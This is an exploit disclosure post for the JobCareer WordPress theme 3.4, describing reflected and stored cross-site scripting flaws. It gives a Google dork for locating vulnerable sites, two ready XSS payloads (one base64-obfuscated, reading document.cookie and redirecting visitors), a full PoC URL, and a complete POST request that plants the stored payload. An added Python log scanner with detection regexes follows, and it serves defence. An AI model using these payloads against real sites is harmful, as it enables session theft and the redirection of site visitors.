JobCareer | Job Board Responsive WordPress Theme v3.4 - Multiple Vulnerabilities

2020.07.27
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

[+] Exploit Title: JobCareer | Job Board Responsive WordPress Theme v3.4 - Multiple Vulnerabilities
[+] Google Dork: inurl:/wp-content/themes/jobcareer/
[+] Date: 2020-07-24
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Chimp Studio [ https://chimpgroup.com ]
[+] Software Version: 3.4
[+] Software Link: https://themeforest.net/item/jobcareer-job-board-responsive-wordpress-theme/14221636
[+] Tested on: Debian 10
[+] CVE:
[+] CWE: CWE-79

### [ Info: ]

[i] Unauthenticated Reflected and Authenticated Persistent XSS vulnerabilities were discovered in the JobCareer theme through 3.4 for WordPress.
[i] Unauthenticated Reflected XSS -> Vulnerable parameters: job_title, specialisms, location
[i] Authenticated Persistent XSS on Employer Profile -> «Complete Address» text field
[i] Demo account: vladvector / vector (login / password)
[i] PoC Employer Profile URL: http://jobcareer.chimpgroup.com/employer/vladvector/

### [ Vulnerabilities: ]

[x] Unauthenticated Reflected XSS
[x] Authenticated Persistent XSS

### [ Payloads: ]

[$] "><svg/onload=eval(atob(`amF2YXNjcmlwdDphbGVydChgVkxBRCBWRUNUT1JgKTthbGVydChkb2N1bWVudC5jb29raWUpO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly92bGFkdmVjdG9yLnJ1Lyc7`))>
[$] "><!--<img src="--><img src=x onerror=(alert)(`VLADVECTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru/`;//">

### [ PoC Unauthenticated Reflected XSS: ]

[!] http://jobcareer.chimpgroup.com/jobs-modern-list/?job_title=%22%3E%3Csvg%2Fonload%3Deval%28atob%28%60amF2YXNjcmlwdDphbGVydChgVkxBRCBWRUNUT1JgKTthbGVydChkb2N1bWVudC5jb29raWUpO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly92bGFkdmVjdG9yLnJ1Lyc7%60%29%29%3E&specialisms=&cs_search_location_field=&location=&radius=5&cs_=&cs_=Find+Job

[!]
GET /jobs-modern-list/?job_title=%22%3E%3Csvg%2Fonload%3Deval%28atob%28%60amF2YXNjcmlwdDphbGVydChgVkxBRCBWRUNUT1JgKTthbGVydChkb2N1bWVudC5jb29raWUpO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly92bGFkdmVjdG9yLnJ1Lyc7%60%29%29%3E&specialisms=&cs_search_location_field=&location=&radius=5&cs_=&cs_=Find+Job HTTP/1.1
Host: jobcareer.chimpgroup.com

### [ PoC Authenticated Persistent XSS -> Employer Profile: ]

[!]
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: jobcareer.chimpgroup.com
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------373898295520776006712397621876
Content-Length: 3832
Origin: http://jobcareer.chimpgroup.com
Referer: http://jobcareer.chimpgroup.com/employer-account/?profile_tab=profile
Cookie: [cookies_here]

-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="media_upload"

undefined
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cover_media_upload"

undefined
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_employer_img"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_cover_employer_img"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="display_name"

VladVector
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_allow_search"

yes
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_specialisms[]"

banking
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="comp_detail"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_facebook"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_twitter"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_linkedin"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_phone_number"

1337
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="user_email"

wihovo6827@invql.com
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="user_url"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_loc_country"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_loc_city"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_comp_address"

"><!--<img src="--><img src=x onerror=(alert)(`VLAD\x20VECTOR`);window.location=`https://vladvector.ru/`;//">
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_loc_address"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_loc_latitude"

51.5073509
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_loc_longitude"

-0.12775829999998223
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_add_new_loc"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_loc_zoom"

11
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_cus_field[established]"

1337
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_cus_field[team-size]"

1337
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_cus_field[type]"

private
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="user_profile"

update_profile
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_user"

12919
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="action"

ajax_employer_form_save
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="post_id"

12919
-----------------------------373898295520776006712397621876--

### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector
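To help site operators spot attempts against the reflected parameters named in the advisory (job_title, specialisms, location), here is an added detection example; it is not part of the advisory and not the theme's code. It URL-decodes those values from access-log request lines and flags markup-injection indicators; the log lines and the indicator list are constructed for the example.

```python
"""Flag reflected-XSS attempts against the JobCareer search parameters
(job_title, specialisms, location) in web-server access logs.
Added example; the sample log lines are constructed, not from the advisory."""
import re
from urllib.parse import parse_qs, urlsplit

WATCHED_PARAMS = ("job_title", "specialisms", "location")

# Indicators checked on the URL-decoded value: a quote that closes the attribute
# the value is echoed into, an injected tag, an inline event handler, or a
# javascript: URL. A base64/atob-wrapped payload is still caught by its
# <svg tag and onload= handler, so the inner script never needs decoding.
INDICATORS = (
    re.compile(r"[\"'][^\"']*>"),
    re.compile(r"<\s*/?\s*(svg|img|script|iframe|body|a)\b", re.I),
    re.compile(r"\bon[a-z]+\s*=", re.I),
    re.compile(r"javascript\s*:", re.I),
)

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample: a benign search, a PoC-style injection, and a benign
# search containing angle brackets that must not be flagged.
SAMPLE_LOG = [
    '203.0.113.5 - - [24/Jul/2020:10:00:01 +0000] "GET /jobs-modern-list/?job_title=developer&location=London&radius=5 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [24/Jul/2020:10:00:09 +0000] "GET /jobs-modern-list/?job_title=%22%3E%3Csvg%2Fonload%3Dalert%281%29%3E&specialisms=&location=&radius=5 HTTP/1.1" 200 5210',
    '203.0.113.9 - - [24/Jul/2020:10:01:30 +0000] "GET /jobs-modern-list/?job_title=C%2B%2B+%26+Go&location=%3CBerlin%3E HTTP/1.1" 200 5100',
]


def suspicious_params(target):
    """Return {param: decoded value} for watched params that match an indicator."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    hits = {}
    for name in WATCHED_PARAMS:
        for value in query.get(name, []):
            if any(p.search(value) for p in INDICATORS):
                hits[name] = value
    return hits


def scan_log(lines):
    """Return (line number, path, hits) for each request carrying an indicator."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        hits = suspicious_params(match.group("target"))
        if hits:
            findings.append((number, urlsplit(match.group("target")).path, hits))
    return findings
```

The stored variant submitted through cs_post_comp_address travels in a POST body that access logs do not record, so that path needs server-side input validation and output escaping rather than log review.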

References:

https://github.com/vladvector/vladvector.github.io/blob/master/exploit/2020-07-24-jobcareer-job-board-responsive-wordpress-theme-v3-4.txt
https://themeforest.net/item/jobcareer-job-board-responsive-wordpress-theme/14221636


Copyright 2020, cxsecurity.com